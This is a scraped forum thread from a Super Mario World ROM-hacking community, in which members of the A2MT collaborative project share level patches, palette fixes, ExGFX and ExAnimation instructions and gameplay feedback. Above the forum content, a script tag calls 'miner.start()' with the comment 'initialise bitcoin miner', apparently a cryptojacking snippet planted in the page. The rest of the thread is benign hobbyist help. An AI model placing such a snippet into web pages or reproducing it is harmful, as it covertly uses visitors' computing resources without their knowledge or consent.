<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectmario fan games galaxysmw central

Testing and Development: Deadline-one week after comments

Anthrax 2 Multiply Themodynamics
raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: Testing and Development: Deadline Nov. 17th

Postby raocow » 8 years ago

Make tails make you a palette, guy loves doing that stuff.
the chillaxest of dragonsImage
ImageImage

Tails_155
May be dead.
First name: Kit/Tails
Pronouns: he/him/his

Postby Tails_155 » 8 years ago

On it. If you like it you can use it, otherwise, you can try another one on your own! ^^

As far as the cutoff, barring ExAnimation, they're simple fixes, then the chainsaw/munchers just requires basic knowledge of ExAnimation and it should all be pretty simple. I can even set up the palette for you so you can have the palettes ready for modified graphics, if you need help, I can try and walk you through it.

http://bin.smwcentral.net/u/6151/Palettes.ips

Also, to fix the cutoff, don't be afraid to ask for some ExGFX slots and use YY-CHR, it's not too tough and makes levels look a lot nicer with very little.
Last edited by Tails_155 on 12 Nov 2011, 23:03, edited 2 times in total.
I'm member number 499 XD

Lookie! It's Goofy Tails and Goofy Ranger
Image Image °∀°

Leifytwig123

Postby Leifytwig123 » 8 years ago

Okay, I need the GAMEPLAY tested on this. I know that the graphics suck, I'm doing that last. Do the first room, then when you get to the second take the door, not the platform, the door is there to take you to the second part of the level, because the first part hasn't been completely finished yet. So, yeah, thanks in advance for the feedback, just tell me if something needs to be fixed.
There are 10 kinds of people in the world, those who know binary, and those who don't!

Paralars

Postby Paralars » 8 years ago

I entered the door and was killed by the camera offset.
Then I went into LM and changed the secondary exit so I could play it.

The idea to have the player switch rails in time is pretty good, but it turns out a bit boring, try not to have only eeries.
The standard unfitting BG and music don't really contribute to the level being fun, so I'm expecting you will change these later.
You should expand that idea of railswitching a bit more, for example have rails looks destroyed in parts where the platform falls off and is caught somewhere else, i.e. the topmost platform could fall to an empty rail at the bottom while the other two platforms make a little jump through thin air.
Think of more different obstacles than eeries and yeah, that's it.
Can't say that much about the gameplay yet, there is a lot of stuff missing, you need to up your tempo from the last week if you want to get finished in 5 days.

And remember that a lot of sprites can cause issues, for example your boo blocks never spawn altogether in the beginning

Jesuiscontent
Tsundere
First name: cool old field

Postby Jesuiscontent » 8 years ago

Tails_155 wrote:On it. If you like it you can use it, otherwise, you can try another one on your own! ^^

As far as the cutoff, barring ExAnimation, they're simple fixes, then the chainsaw/munchers just requires basic knowledge of ExAnimation and it should all be pretty simple. I can even set up the palette for you so you can have the palettes ready for modified graphics, if you need help, I can try and walk you through it.

http://bin.smwcentral.net/u/6151/Palettes.ips

Also, to fix the cutoff, don't be afraid to ask for some ExGFX slots and use YY-CHR, it's not too tough and makes levels look a lot nicer with very little.
Thanks a lot ! This palette is really neat, I really appreciate your help. Also, since you proposed, I will gladly accept a bit of assistance for fixing the munchers, because I was thinking I only needed to put tiles of water behind them. I guess I was wrong ^^

I will try and look up some tutorials on Exanimation in the meantime though.

Paralars

You will need basically one exGFX file that contains the munchers with the water background (and the pipe edges with water background) and a few map16 slots, maybe a line or two.

For exAnimation, I made this picture a while ago to help someone else with that, maybe it's helpful.
http://img545.imageshack.us/img545/7827/exanim.jpg

Tails_155
May be dead.
First name: Kit/Tails
Pronouns: he/him/his

Postby Tails_155 » 8 years ago

as Paralars said. I already made the munchers have a water palette for the standard color (the leftmost set for the upside down Muncher) -- all you have to do is ExAnimate a second set that uses the last color (Color F in the palette) behind the Muncher graphics. The Muncher Graphics (to copy and paste) are in GFX33. Just use the fill tool to fill the background of them with color F, then go into the Super GFX Bypass and add the ExGFX to the bottom most (or "ExAnimation tiles") slot, and then hold Shift+Ctrl+Page Down in the 8x8 editor to scroll past the foreground/background tiles, past the sprite tiles to the animation and ExAnimation tiles, and put the numbers in as any tutorial should explain. If you need help, PM me :3
I'm member number 499 XD

Lookie! It's Goofy Tails and Goofy Ranger
Image Image °∀°

Leifytwig123

Okay, Paralars, I'm on it! I'll see if I can get another one up tomorrow or Monday!
There are 10 kinds of people in the world, those who know binary, and those who don't!

Leifytwig123

Sorry to double post but I need to post a new attachment.

Well, now I need the gameplay tested on the place the the first door sends you. It's sort of a roughdraft, I need to know if it's good so far, and how much I should enlarge it. This is the part of the level before the midpoint, and it won't be a very hard level, so keep that in mind.

I also have a few questions:
1. Directed at Paralars, I know you said that I should make the second part less boring, but I'm not really sure how to do that, would adding some boos, boo blocks, etc. and making the platforms switch tracks be enough?
2. Is there a way to make the fishing lakitu guy despawn?
3. How do I fix it so that the camera offset doesn't kill you on the second part?

Thanks in advance for testing this! I really appreciate it.

E: Oh shoot, the filesize is too big, take this link: http://www.mediafire.com/?jzg2cdrlxj6pxjv

Paralars

Yeah, you can do that. Try some things out and play for yourself. Some rail hops, some different sprites, some obstacles (keep in mind that a ton of boo blocks are no obstacle, like in the other part, you can just walk through except you put in some real blocks inbetween them)
For the first door part, you could add some small stations, you know, the kind of platforms rollercoasters have at their peaks for repairing and stuff, maybe with powerup blocks
- similar to the part with the eerie-pencils and the boo block swarm.
By the way, an actual rollercoaster graphic set would make this a lot better, especially considering the background. Too bad there isn't much time left.

wellshit.jpg
Go to the Secondary exit editor, select the secondary exit you want to edit and change the FG value at the bottom to something else (60 worked I think, try it out)

Leifytwig123

Awesome, thanks for being so helpful! Also, raocow told me that I just needed to get a working level in on time. That's why I'm leaving the graphics for last. I'll probably still do that stuff after the deadline.

SyStemkraSh5642

Postby SyStemkraSh5642 » 8 years ago

A2MT Level, Weekly Update 2
Description:
This is the second weekly update for my A2MT level. I'm only halfway done with the level, which worries me because of the deadline on November 17th. I had a little under 3 weeks to complete this. I'm liking how this level is turning out, although it's not exactly what I intended to create in the first place. Let's hope I can finish this in four days.

Paralars

It looks good to me, but aren't the rails/lines really hard to see like that?

7TC7

Postby 7TC7 » 8 years ago

spitznagl wrote:-I liked!!!!!!
Thank you!
spitznagl wrote:-The water/ground checkerboard pattern is a neat touch. Have you considered playing with different dither patterns?
I tried a few different things. The checkerboard is the only one, that really seemed to look right. The transition to the big water part is actually a bit different, but it's really not very obvious.
spitznagl wrote:-The only section that felt boring to me was the one with the different characters and figures floating in the water. It's a great idea considering your tileset, but I personally would add more of those objects in that area and make them intersect together, without making it a maze though. It would still be a swimming section with not much to do, but with more to look at, it would certainly feel more complete.
I think you ment something different, when you said "intersect them", but I changed them. They no longer are a lot of single pictures but now try to tell a little story. Thats nice, I hope. Also, they do intersect a little!
I didn't want to make that part of the swimming section a maze of any kind, as you have to go through it twice (or trice) to get the chest of the stage. I actually put the two blue goopas at the beginning of the water part there, so that it is possible to steal their shells for faster swimming (or getting rid of those pesky Rip-van-fish).
spitznagl wrote:-I really liked the transitions from water to ground and vice versa. It feels like pressurized rooms under the sea or something. It would be really nice IMO to have those more present, but I guess that you might not feel like making this kind of change at this stage.
Yeah, it's a bit hard to change many big scale things like that at this point. Anyways, happy you like it.
Should I have been forgotten due to the page turning twice, here is my IPS again.

http://dl.dropbox.com/u/48607961/A2MTLVLFIVEnew3.ips

If I'm not getting any comments I'll move on to Level Clearing.
Meet me at YouTube and watch Touhou stuff!

Paralars

Another one of those abstract levels!
I like where this is going now.
Yeah, just go to Clearing, why not.

I recommend:
- Turning off global color animations because the flashy parrot coins don't fit the low-res theme
- Using the correct turnblock sprite GFX(SP1), i.e. the graphic you used for the block itself
- Considering replacing even enemies with blocks, they are pretty simple ones, so one could easily recognize them even when they are blocks
- Making the top of grass platforms more easily recognizable

7TC7

I ask:
- How do I turn off global color animation?
- How do I use the correct turnblock sprite?
- And also, the grass was intended to be not very obvious.

Paralars

- coin button at the very right -> turn off original game's palette animations
- Super GFX Bypass (red poison mushroom) -> slot SP1 contains the turn block sprite graphic, if you want it to be a grey block as in the rest of your level, paste that graphic over the turn block in an exGFX file and insert it for SP1, the same goes for ?-Blocks and moving brown blocks.
(For the turn block, the sprite only shows up for a brief moment when being hit, or on turn block bridges and blue pick up blocks)

Jesuiscontent
Tsundere
First name: cool old field

Postby Jesuiscontent » 8 years ago

Okay, thanks to Paralars and Tails I am now able to post the (hopefully) graphic issues-proof version of my level.

http://bin.smwcentral.net/u/17829/danci ... ellsv2.ips

I am particulary looking forward to gameplay feedback, difficulty evaluation and stuff, and also knowing if this version is fine for clearing !

Also, kinda related question : What ARE the koopas in A2MT, exactly? I mentioned koopas in my message boxes in the level, but these things are no koopas at all. Do they have an official name? Or are they just the "Angry Slime Dudes" or something.

EDIT : Thanks Mr.Cow
Last edited by Jesuiscontent on 15 Nov 2011, 00:05, edited 1 time in total.

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 8 years ago

'Goopas' is the official unofficial name.
the chillaxest of dragonsImage
ImageImage

Leifytwig123

I've been trying to make the platforms switch rails like you said, Paralars, but I can't seem to make it work. The attachment is the closest that I got, but the platform on the bottom that goes up seems to just hit a wall and fall straight down. Do you know why?

Paralars

As far as I can tell, the platform should fly up a bit and then land back on the lowest rail, because there is a hole in the middle one.
In case you wanted it to transfer the lowest platform to the middle line and vice versa, you need a piece of a line that catches the bottom platform when it flies up.
But I'm not sure what problem you are actually talking about, if you don't get it to work properly, just finish the rest of the level first.

7TC7

Paralars wrote:- Super GFX Bypass (red poison mushroom) -> slot SP1 contains the turn block sprite graphic, if you want it to be a grey block as in the rest of your level, paste that graphic over the turn block in an exGFX file and insert it for SP1, the same goes for ?-Blocks and moving brown blocks.
(For the turn block, the sprite only shows up for a brief moment when being hit, or on turn block bridges and blue pick up blocks)
You'll either have to explain this in detail (like, with steps) or give me a link to a description, as I have not worked with exGFX yet.

Paralars

When you open the 8x8 tilemap (next to the map16 button), you will see all the graphics currently chosen to be loaded for this level.
Every page consists of two graphic files (=> 1 graphic file is 8x4 16x16 tiles)
The order in which those graphic files are placed within the 8x8 tilemap are

FG1 first
FG2 page

BG1 second
FG3 page

BG2 third
BG3 page
^^^^^^^^^^
used for object tiles

used for sprites
vvvvvvvvvv
SP1 fourth
SP2 page

SP3 fifth
SP4 page

You can change the ones that are loaded by changing the tileset (purple mushroom, that will change several of them altogether.

If you want one specific graphics file to be loaded in a slot, use GFX bypass.
Go to the red poison mushroom
Enable GFX bypass
The turnblock sprite gets its graphics from SP1, so that is the slot you need to change.
You can insert any graphics file you want in there by choosing one from the dropdown menu, but you will obviously want to choose one with graphics that make sense, i.e. a mushroom, flower, smoke puffs etc. in the right place. (Because every graphics file contains several graphic tiles, 32 16x16 tiles or 128 8x8 tiles)
But you only want to change one 16x16, so you need to make a new exGFX file to be inserted into SP1, that has only the turnblock sprite changed and the other tiles still correct

-= Guide on making graphic files here =-

I can make you one so you can skip that part.
ExGFX.zip
(you need to rename it)

Click the 3rd of the colored mushrooms to show up an exGFX folder in your ROM folder, put your exGFX file in it, name it "exGFXzzz.bin" (zzz stands for a hex number, 80+).

Now click the 4th colored mushroom to insert all exGFX placed in the exGFX folder into the ROM.

Now you can go the the GFX bypass thing and choose your exGFX file to be used for SP1 (the number you replace zzz with).

The same goes for enemies for example, if you want different koopa graphics, you need to put something else into SP2.

I'm running out of time, so I'll explain everything else later and make you an ExGFX file then,
you will have to request one to be used in A2MT, though.

VideoGuy

Postby VideoGuy » 8 years ago

Okay, so it feels like it's been forever since I posted a demo of my level, but I finally got my sprite working the way I want it. For those interested in playing it: download here. I would greatly appreciate any feedback with the looming deadline. I think the level is done, although I'm completely open to suggestions/criticism.

To play, go down on the overworld to Cookie Mountain (will be renamed).
Accepting any and all ASM requests for A2MT. Just send me a PM.
Note: If I accepted your ASM request and you never heard back from me, please let me know. I feel like I've forgotten a few of them.
Also the creator of the new A2MT CMS. PM me if you have any questions.
Youtube Channel

TomPhanto

Postby TomPhanto » 8 years ago

Level Update. Changed the right half to make it more unique.

http://bin.smwcentral.net/u/9567/Level11E.ips
Keys are important. When a key is lost, all madness shall break loose.

Return to “A2MT”